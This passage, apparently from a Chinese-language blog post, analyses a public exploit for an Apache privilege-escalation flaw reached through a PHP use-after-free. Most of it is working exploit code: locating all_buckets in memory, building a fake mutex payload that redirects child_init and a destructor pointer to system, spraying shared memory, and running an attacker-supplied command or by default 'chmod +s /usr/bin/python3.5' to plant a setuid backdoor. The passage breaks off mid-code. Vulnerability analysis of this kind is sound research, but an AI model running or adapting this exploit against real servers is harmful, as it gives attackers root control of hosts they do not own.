<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># zend_string.refcount = 0</span></span><br><span class="line">$x-&gt;y = <span class="hljs-number">0x00</span>;</span><br><span class="line"><span class="hljs-comment"># zend_string.len</span></span><br><span class="line">$x-&gt;d = <span class="hljs-number">0x100</span>;</span><br><span class="line"><span class="hljs-comment"># zend_string.val[0-4]</span></span><br><span class="line">$x-&gt;h = <span class="hljs-number">0x13121110</span>;</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span>(!(</span><br><span class="line">	strlen(<span class="hljs-keyword">$this</span>-&gt;abc) === $x-&gt;d &amp;&amp;</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;abc[<span class="hljs-number">0</span>] == <span class="hljs-string">"\x10"</span> &amp;&amp;</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;abc[<span class="hljs-number">1</span>] == <span class="hljs-string">"\x11"</span> &amp;&amp;</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;abc[<span class="hljs-number">2</span>] == <span class="hljs-string">"\x12"</span> &amp;&amp;</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;abc[<span class="hljs-number">3</span>] == <span class="hljs-string">"\x13"</span></span><br><span class="line">))</span><br><span class="line">&#123;</span><br><span class="line">	o(<span class="hljs-string">'UAF failed, exiting.'</span>);</span><br><span class="line">	<span class="hljs-keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line">	o(<span class="hljs-string">'UAF successful.'</span>);;</span><br></pre></td></tr></table></figure>
<p>最后别忘了释放掉<code>$room</code>，产生的空闲块将保护我们控制的结构，后面再新建变量都会优先使用这些内存。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">unset</span>($room);</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150920.jpg" alt></p>
<h4 id="控制并修改UAF的结构"><a href="#控制并修改UAF的结构" class="headerlink" title="控制并修改UAF的结构"></a>控制并修改UAF的结构</h4><p>利用这个PHP漏洞的目的是为了能够获取读写SHM的权限，现在我们能够读写<code>zend_string.val</code>的内容，能读写的长度是<code>zend_string.len</code>，因此只要将<code>len</code>的值增加到包括SHM的范围。</p>
<p>这时我们已经知道了SHM的绝对地址，还需要知道<code>abc</code>的绝对地址，得到两者之间的偏移量才可以修改<code>len</code>。因此需要找到字符串<code>$this-&gt;abc</code>在内存中的位置：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$address = str2ptr(<span class="hljs-keyword">$this</span>-&gt;abc, <span class="hljs-number">0x70</span> * <span class="hljs-number">2</span> - <span class="hljs-number">24</span>);</span><br><span class="line">$address = $address - <span class="hljs-number">0x70</span> * <span class="hljs-number">3</span>;</span><br><span class="line">$address = $address + <span class="hljs-number">24</span>;</span><br><span class="line">o(<span class="hljs-string">'Address of $abc: 0x'</span> . dechex($address));</span><br></pre></td></tr></table></figure>
<p>然后我们就可以计算两者间的偏移量了，还要注意的是，因为后面我们需要在内存中查找<code>all_bucket</code>，而它在apache的内存中所以我们的<code>len</code>需要将SHM和apache的内存都覆盖到，所以作者的WriteUp中说SHM和apache的内存都需要在PHP堆之后，而它们也确实都在PHP堆之后。</p>
<p>找SHM和apache的内存两者间较大的值，减去<code>abc</code>的地址，将得到的偏移通过<code>DateInterval</code>的<code>d</code>属性修改来修改<code>zend_string.len</code>。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$distance = </span><br><span class="line">	max($addresses[<span class="hljs-string">'apache'</span>][<span class="hljs-number">1</span>], $addresses[<span class="hljs-string">'shm'</span>][<span class="hljs-number">1</span>]) - $address;</span><br><span class="line">$x-&gt;d = $distance;</span><br></pre></td></tr></table></figure>
<p>这等同于将<code>zend_string</code>结构（$this-&gt;abc）中的<code>len</code>修改为一个超大的值，一直包括到SHM和Apache内存区域，这下我们就可以读写这个范围内的内存了。</p>
<h3 id="在内存中定位all-buckets"><a href="#在内存中定位all-buckets" class="headerlink" title="在内存中定位all_buckets"></a>在内存中定位all_buckets</h3><p>根据内存模式查找all_buckets数组的位置，这在作者的writeup中有提到。<code>mutex</code>在<code>all_buckets</code>偏移0x10的位置，而<code>meth</code>在<code>mutex</code>偏移0x8的位置，根据该特征查找all_buckets数组。</p>
<p>首先，在apache的内存中搜索<code>all_buckets[idx]-&gt;mutex</code>，接着验证<code>meth</code>，是否在libapr.so的.data段中，最后因为<code>meth</code>指向libapr.so中定义的函数，因此验证其是否在.text段。满足这些条件的就是我们要找的<code>all_buckets[]</code>结构。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">$all_buckets = <span class="hljs-number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">for</span>(</span><br><span class="line">	$i = $addresses[<span class="hljs-string">'apache'</span>][<span class="hljs-number">0</span>] + <span class="hljs-number">0x10</span>;</span><br><span class="line">	$i &lt; $addresses[<span class="hljs-string">'apache'</span>][<span class="hljs-number">1</span>] - <span class="hljs-number">0x08</span>;</span><br><span class="line">	$i += <span class="hljs-number">8</span></span><br><span class="line">)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="hljs-comment"># mutex</span></span><br><span class="line">	$mutex = $pointer = str2ptr(<span class="hljs-keyword">$this</span>-&gt;abc, $i - $address);</span><br><span class="line">	<span class="hljs-keyword">if</span>(!in($pointer, $addresses[<span class="hljs-string">'apache'</span>]))</span><br><span class="line">		<span class="hljs-keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">	<span class="hljs-comment"># meth</span></span><br><span class="line">	$meth = $pointer = str2ptr(<span class="hljs-keyword">$this</span>-&gt;abc, $pointer + <span class="hljs-number">0x8</span> - $address);</span><br><span class="line">	<span class="hljs-keyword">if</span>(!in($pointer, $addresses[<span class="hljs-string">'libaprR'</span>]))</span><br><span class="line">		<span class="hljs-keyword">continue</span>;</span><br><span class="line"></span><br><span class="line">	o(<span class="hljs-string">'  [&amp;mutex]: 0x'</span> . dechex($i));</span><br><span class="line">	o(<span class="hljs-string">'    [mutex]: 0x'</span> . dechex($mutex));</span><br><span class="line">	o(<span class="hljs-string">'      [meth]: 0x'</span> . dechex($meth));</span><br></pre></td></tr></table></figure>
<p>顺便将meth结构中所有函数指针打印出来，第6个就是我们要用到的<code>(*child_init)()</code>。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">	<span class="hljs-comment"># meth-&gt;*</span></span><br><span class="line">	<span class="hljs-comment"># flags</span></span><br><span class="line">	<span class="hljs-keyword">if</span>(str2ptr(<span class="hljs-keyword">$this</span>-&gt;abc, $pointer - $address) != <span class="hljs-number">0</span>)</span><br><span class="line">		<span class="hljs-keyword">continue</span>;</span><br><span class="line">	<span class="hljs-comment"># methods</span></span><br><span class="line">	<span class="hljs-keyword">for</span>($j=<span class="hljs-number">0</span>;$j&lt;<span class="hljs-number">7</span>;$j++)</span><br><span class="line">	&#123;</span><br><span class="line">		$m = str2ptr(<span class="hljs-keyword">$this</span>-&gt;abc, $pointer + <span class="hljs-number">0x8</span> + $j * <span class="hljs-number">8</span> - $address);</span><br><span class="line">		<span class="hljs-keyword">if</span>(!in($m, $addresses[<span class="hljs-string">'libaprX'</span>]))</span><br><span class="line">			<span class="hljs-keyword">continue</span> <span class="hljs-number">2</span>;</span><br><span class="line">		o(<span class="hljs-string">'        [*]: 0x'</span> . dechex($m));</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	$all_buckets = $i - <span class="hljs-number">0x10</span>;</span><br><span class="line">	o(<span class="hljs-string">'all_buckets = 0x'</span> . dechex($all_buckets));</span><br><span class="line">	<span class="hljs-keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这是meth的结构，可以对照着看一看：<br><figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">apr_proc_mutex_unix_lock_methods_t</span> &#123;</span></span><br><span class="line">    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> flags;</span><br><span class="line">    <span class="hljs-keyword">apr_status_t</span> (*create)(<span class="hljs-keyword">apr_proc_mutex_t</span> *, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *);</span><br><span class="line">    <span class="hljs-keyword">apr_status_t</span> (*acquire)(<span class="hljs-keyword">apr_proc_mutex_t</span> *);</span><br><span class="line">    <span class="hljs-keyword">apr_status_t</span> (*tryacquire)(<span class="hljs-keyword">apr_proc_mutex_t</span> *);</span><br><span class="line">    <span class="hljs-keyword">apr_status_t</span> (*release)(<span class="hljs-keyword">apr_proc_mutex_t</span> *);</span><br><span class="line">    <span class="hljs-keyword">apr_status_t</span> (*cleanup)(<span class="hljs-keyword">void</span> *);</span><br><span class="line">    <span class="hljs-keyword">apr_status_t</span> (*child_init)(<span class="hljs-keyword">apr_proc_mutex_t</span> **, <span class="hljs-keyword">apr_pool_t</span> *, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *);</span><br><span class="line">    <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *name;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823151312.jpg" alt></p>
<h3 id="计算索引buckets"><a href="#计算索引buckets" class="headerlink" title="计算索引buckets"></a>计算索引buckets</h3><p>再回忆一下漏洞利用的方法：在SHM中构造payload （prefork_child_bucket结构），同时将剩余SHM区域喷射payload地址（并非payload起始地址）， 控制指向喷射区域，所以<code>&amp;all_buckets[bucket]</code>中的<code>meth</code>必然指向payload ，而payload中我们已将<code>child_init</code>函数的指针覆盖为我们想要执行函数的指针，就可以达到漏洞利用的目的。</p>
<p>要想控制<code>&amp;all_buckets[bucket]</code>指向<code>prefork_child_bucket</code>结构，不能直接将该结构精确放在某个位置，然后直接计算两者间的偏移，因为<code>all_buckets</code>的地址在每优雅重启后会发生变化，所以漏洞被触发时<code>all_buckets</code>的地址将与我们找到的地址是不同的，这就是作者在EXP中进行堆喷的目的。</p>
<p><code>all_buckets</code>是一个结构体数组，元素<code>prefork_child_bucket</code>结构由三个指针组成：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">prefork_child_bucket</span> &#123;</span></span><br><span class="line">    <span class="hljs-keyword">ap_pod_t</span> *pod;</span><br><span class="line">    ap_listen_rec *listeners;</span><br><span class="line">    <span class="hljs-keyword">apr_proc_mutex_t</span> *mutex;</span><br><span class="line">&#125; prefork_child_bucket;</span><br></pre></td></tr></table></figure>
<p>如果在SHM中大量喷射一个指向payload的地址，只要让<code>&amp;all_buckets[bucket]</code>落在该区域内，payload就能得到执行，如下图中所示：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823150947.jpg" alt></p>
<p>并且在EXP中，作者一共使用了两种方法来提高利用成功率：</p>
<ol>
<li>喷射SHM，也就是上面提到的方法</li>
<li>修改每个worker的<code>process_score-&gt;bucket</code>结构，这样一来，利用成功率就可以再乘以Apache Worker的数量。这也是exp开始时调用<code>$workers_pids = get_workers_pids();</code>的原因。</li>
</ol>
<p>先看第一种方法的实现：</p>
<p>SHM的起始部分是被apache的各个进程使用的，可以用SHM末尾的绝对地址<code>$spray_max</code>，减去未使用的内存空间大小<code>$spray_size</code>，得到要喷射区域的大小<code>$spray_size</code>；而未使用空间的大小可以通过减去已使用<code>worker_score</code>结构的总大小得到。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$size_prefork_child_bucket = <span class="hljs-number">24</span>;</span><br><span class="line">$size_worker_score = <span class="hljs-number">264</span>;</span><br><span class="line"></span><br><span class="line">$spray_size = $size_worker_score * (<span class="hljs-number">256</span> - sizeof($workers_pids) * <span class="hljs-number">2</span>);</span><br><span class="line">$spray_max = $addresses[<span class="hljs-string">'shm'</span>][<span class="hljs-number">1</span>];</span><br><span class="line">$spray_min = $spray_max - $spray_size;</span><br></pre></td></tr></table></figure>
<p>然后找喷射区域地址的中间值，计算它和<code>all_buckets</code>地址的偏移，再除以<code>prefork_child_bucket</code>结构的大小，就可以得到一个<code>all_buckets</code>数组下标索引，但别忘了SHM在<code>all_buckets</code>之前，所以这个索引还要取负值，这个值用<code>$bucket_index_middle</code>表示。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$spray_middle = (int) (($spray_min + $spray_max) / <span class="hljs-number">2</span>);</span><br><span class="line">$bucket_index_middle = (int) ( - ($all_buckets - $spray_middle) / $size_prefork_child_bucket );</span><br></pre></td></tr></table></figure>
<p>这样做的目的在于，在每优雅重启后，即便<code>all_buckets</code>的地址有所变化，<code>&amp;all_buckets[bucket]</code>指向的位置会在<code>$spray_middle</code>上下浮动，最大程度上保证了该指针落在喷射的内存范围内，如下图所示：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823151010.jpg" alt></p>
<h3 id="设置payload并喷射SHM"><a href="#设置payload并喷射SHM" class="headerlink" title="设置payload并喷射SHM"></a>设置payload并喷射SHM</h3><p>Payload由三个部分组成</p>
<ol>
<li>bucket，用来存放要执行的命令，这是因为payload已经成了几个结构的叠加。</li>
<li>meth，它还是apr_proc_mutex_unix_lock_methods_t结构，只是它的<code>child_init</code>替换成了<code>zend_object_std_dtor</code>，其他指针置空。</li>
<li>properties，这是PHP内部结构<code>zend_object</code>的一个成员。</li>
</ol>
<p>回忆漏洞的攻击链，最后的<code>child_init</code>被替换成函数<code>zend_object_std_dtor</code>执行，其原型如下，传入一个<code>zend_object</code>结构：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-function">ZEND_API <span class="hljs-keyword">void</span> <span class="hljs-title">zend_object_std_dtor</span><span class="hljs-params">(zend_object *object)</span></span>;</span><br></pre></td></tr></table></figure>
<p>所以原本传给<code>child_init</code>的<code>&amp;my_bucket-&gt;mutex</code>（prefork_child_bucket结构的一部分）就和<code>zend_object</code>相叠加了。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823151027.jpg" alt></p>
<p><code>zend_object_std_dtor</code>的执行又导致以下调用链：</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">mutex = &amp;my_bucket-&gt;mutex</span><br><span class="line">apr_proc_mutex_child_init(mutex)</span><br><span class="line">		<span class="hljs-comment">//(*mutex)-&gt;meth-&gt;child_init()</span></span><br><span class="line">  	(*mutex)-&gt;meth-&gt;zend_object_std_dtor(object)		<span class="hljs-comment">//[object = mutex]</span></span><br><span class="line">				ht = object-&gt;properties</span><br><span class="line">				zend_array_destroy(ht)</span><br><span class="line">				zend_hash_destroy(ht)</span><br><span class="line">						val = &amp;ht-&gt;arData[<span class="hljs-number">0</span>]-&gt;val</span><br><span class="line">						ht-&gt;pDestructor(val)</span><br></pre></td></tr></table></figure>
<p>上面的代码<code>properties</code>是一个<code>zend_array</code>结构，如下所示，我们控制其中的<code>arData</code>，<code>pDestructor</code>，如果我们将上面<code>&amp;ht-&gt;arData[0]-&gt;val</code>放入要执行的命令，<code>pDestructor()</code>覆盖为<code>system</code>的地址，就可以实现命令执行了。</p>
<figure class="highlight c hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">zend_array</span> &#123;</span></span><br><span class="line">    zend_refcounted_h gc;</span><br><span class="line">		<span class="hljs-comment">//...</span></span><br><span class="line">    <span class="hljs-keyword">uint32_t</span>          nTableMask;</span><br><span class="line">    Bucket           *arData;</span><br><span class="line">    <span class="hljs-keyword">uint32_t</span>          nNumUsed;</span><br><span class="line">    <span class="hljs-keyword">uint32_t</span>          nNumOfElements;</span><br><span class="line">    <span class="hljs-keyword">uint32_t</span>          nTableSize;</span><br><span class="line">    <span class="hljs-keyword">uint32_t</span>          nInternalPointer;</span><br><span class="line">    zend_long         nNextFreeElement;</span><br><span class="line">    <span class="hljs-keyword">dtor_func_t</span>       pDestructor;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>回到exp中，首先构造bucket部分，放入要执行的命令，没有参数时默认执行”chmod +s /usr/bin/python3.5”，但是自定义的命令长度也不能超过152字节。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># Build payload</span></span><br><span class="line"></span><br><span class="line">$payload_start = $spray_min - $size_worker_score;</span><br><span class="line"></span><br><span class="line">$z = ptr2str(<span class="hljs-number">0</span>);</span><br><span class="line"></span><br><span class="line">	<span class="hljs-comment"># Payload maxsize 264 - 112 = 152</span></span><br><span class="line">    	$bucket = <span class="hljs-keyword">isset</span>($_REQUEST[<span class="hljs-string">'cmd'</span>]) ?</span><br><span class="line">    		$_REQUEST[<span class="hljs-string">'cmd'</span>] :</span><br><span class="line">    		<span class="hljs-string">"chmod +s /usr/bin/python3.5"</span>;</span><br><span class="line"></span><br><span class="line">    	<span class="hljs-keyword">if</span>(strlen($bucket) &gt; $size_worker_score - <span class="hljs-number">112</span>)</span><br><span class="line">		&#123;</span><br><span class="line">			o(</span><br><span class="line">				<span class="hljs-string">'Payload size is bigger than available space ('</span> .</span><br><span class="line">				($size_worker_score - <span class="hljs-number">112</span>) .</span><br><span class="line">				<span class="hljs-string">'), exiting.'</span></span><br><span class="line">			);</span><br><span class="line">			<span class="hljs-keyword">exit</span>();</span><br><span class="line">		&#125;</span><br><span class="line">    	<span class="hljs-comment"># Align</span></span><br><span class="line">    	$bucket = str_pad($bucket, $size_worker_score - <span class="hljs-number">112</span>, <span class="hljs-string">"\x00"</span>);</span><br></pre></td></tr></table></figure>
<p>然后是meth，将原本<code>child_init</code>的指针改为<code>zend_object_std_dtor</code>：</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># apr_proc_mutex_unix_lock_methods_t</span></span><br><span class="line">		$meth = </span><br><span class="line">		    $z .</span><br><span class="line">		    $z .</span><br><span class="line">		    $z .</span><br><span class="line">		    $z .</span><br><span class="line">		    $z .</span><br><span class="line">		    $z .</span><br><span class="line">			<span class="hljs-comment"># child_init</span></span><br><span class="line">		    ptr2str($addresses[<span class="hljs-string">'zend_object_std_dtor'</span>])</span><br><span class="line">		;</span><br></pre></td></tr></table></figure>
<p>经过调试也可以看到child_init被覆盖：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823151052.jpg" alt></p>
<p>然后是properties（zend_array和apr_proc_mutex_t结构的叠加），<code>u-nTableMask</code>的位置将用作<code>apr_proc_mutex_t</code>结构的<code>meth</code>，而<code>arData</code>指向payload中的bucket。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">	$properties = </span><br><span class="line">	<span class="hljs-comment"># refcount</span></span><br><span class="line">	ptr2str(<span class="hljs-number">1</span>) .</span><br><span class="line">	<span class="hljs-comment"># u-nTableMask meth</span></span><br><span class="line">	ptr2str($payload_start + strlen($bucket)) .</span><br><span class="line">	<span class="hljs-comment"># Bucket arData</span></span><br><span class="line">	ptr2str($payload_start) .</span><br><span class="line">	<span class="hljs-comment"># uint32_t nNumUsed;</span></span><br><span class="line">	ptr2str(<span class="hljs-number">1</span>, <span class="hljs-number">4</span>) .</span><br><span class="line">    <span class="hljs-comment"># uint32_t nNumOfElements;</span></span><br><span class="line">	ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">4</span>) .</span><br><span class="line">	<span class="hljs-comment"># uint32_t nTableSize</span></span><br><span class="line">	ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">4</span>) .</span><br><span class="line">	<span class="hljs-comment"># uint32_t nInternalPointer</span></span><br><span class="line">	ptr2str(<span class="hljs-number">0</span>, <span class="hljs-number">4</span>) .</span><br><span class="line">	<span class="hljs-comment"># zend_long nNextFreeElement</span></span><br><span class="line">	$z .</span><br><span class="line">	<span class="hljs-comment"># dtor_func_t pDestructor</span></span><br><span class="line">	ptr2str($addresses[<span class="hljs-string">'system'</span>])</span><br><span class="line">;</span><br></pre></td></tr></table></figure>
<p>将各部分组合：<br><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$payload = </span><br><span class="line">	$bucket .</span><br><span class="line">	$meth .</span><br><span class="line">	$properties</span><br><span class="line">;</span><br></pre></td></tr></table></figure></p>
<p>通过前面UAF控制的字符串<code>abc</code>写入SHM未使用部分的开头：<br><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">o(<span class="hljs-string">'Placing payload at address 0x'</span> . dechex($payload_start));</span><br><span class="line"></span><br><span class="line">$p = $payload_start - $address;</span><br><span class="line"><span class="hljs-keyword">for</span>(</span><br><span class="line">	$i = <span class="hljs-number">0</span>;</span><br><span class="line">	$i &lt; strlen($payload);</span><br><span class="line">	$i++</span><br><span class="line">)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;abc[$p+$i] = $payload[$i];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>打印信息，将SHM剩下的部分喷射为properties的地址：<br><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">$properties_address = $payload_start + strlen($bucket) + strlen($meth);</span><br><span class="line">o(<span class="hljs-string">'Spraying pointer'</span>);</span><br><span class="line">o(<span class="hljs-string">'  Address: 0x'</span> . dechex($properties_address));</span><br><span class="line">o(<span class="hljs-string">'  From: 0x'</span> . dechex($spray_min));</span><br><span class="line">o(<span class="hljs-string">'  To: 0x'</span> . dechex($spray_max));</span><br><span class="line">o(<span class="hljs-string">'  Size: 0x'</span> . dechex($spray_size));</span><br><span class="line">o(<span class="hljs-string">'  Covered: 0x'</span> . dechex($spray_size * count($workers_pids)));</span><br><span class="line">o(<span class="hljs-string">'  Apache: 0x'</span> . dechex(</span><br><span class="line">	$addresses[<span class="hljs-string">'apache'</span>][<span class="hljs-number">1</span>] -</span><br><span class="line">	$addresses[<span class="hljs-string">'apache'</span>][<span class="hljs-number">0</span>]</span><br><span class="line">));</span><br><span class="line"></span><br><span class="line">$s_properties_address = ptr2str($properties_address);</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">for</span>(</span><br><span class="line">	$i = $spray_min;</span><br><span class="line">	$i &lt; $spray_max;</span><br><span class="line">	$i++</span><br><span class="line">)</span><br><span class="line">&#123;</span><br><span class="line">	<span class="hljs-keyword">$this</span>-&gt;abc[$i - $address] = $s_properties_address[$i % <span class="hljs-number">8</span>];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>讲到这里可以再回头看看文章刚开始的图，应该就更容易理解了。</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823151151.jpg" alt></p>
<h3 id="进一步提高成功率"><a href="#进一步提高成功率" class="headerlink" title="进一步提高成功率"></a>进一步提高成功率</h3><p>前面还讲到，可以修改每个worker的<code>process_score-&gt;bucket</code>结构，这样一来，利用成功率就可以再乘以Apache Worker的数量，因为2.4中计算出的bucket索引能落在了SHM之外，如果有多个worker，如下图所示，就能提高<code>&amp;all_buckets[bucket]</code>落在SHM中的概率：</p>
<p><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190823151208.jpg" alt></p>
<p>迭代查找每个<code>process_score</code>结构直到找到每个PID，再将找到的PID<code>$workers_pids</code>中的PID对比，匹配的就说明是正确的结构。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$spray_nb_buckets = (int) ($spray_size / $size_prefork_child_bucket);</span><br><span class="line">$total_nb_buckets = $spray_nb_buckets * count($workers_pids);</span><br><span class="line">$bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / <span class="hljs-number">2</span>);</span><br><span class="line"></span><br><span class="line">		<span class="hljs-keyword">for</span>(</span><br><span class="line">			$p = $addresses[<span class="hljs-string">'shm'</span>][<span class="hljs-number">0</span>] + <span class="hljs-number">0x20</span>;</span><br><span class="line">			$p &lt; $addresses[<span class="hljs-string">'shm'</span>][<span class="hljs-number">1</span>] &amp;&amp; count($workers_pids) &gt; <span class="hljs-number">0</span>;</span><br><span 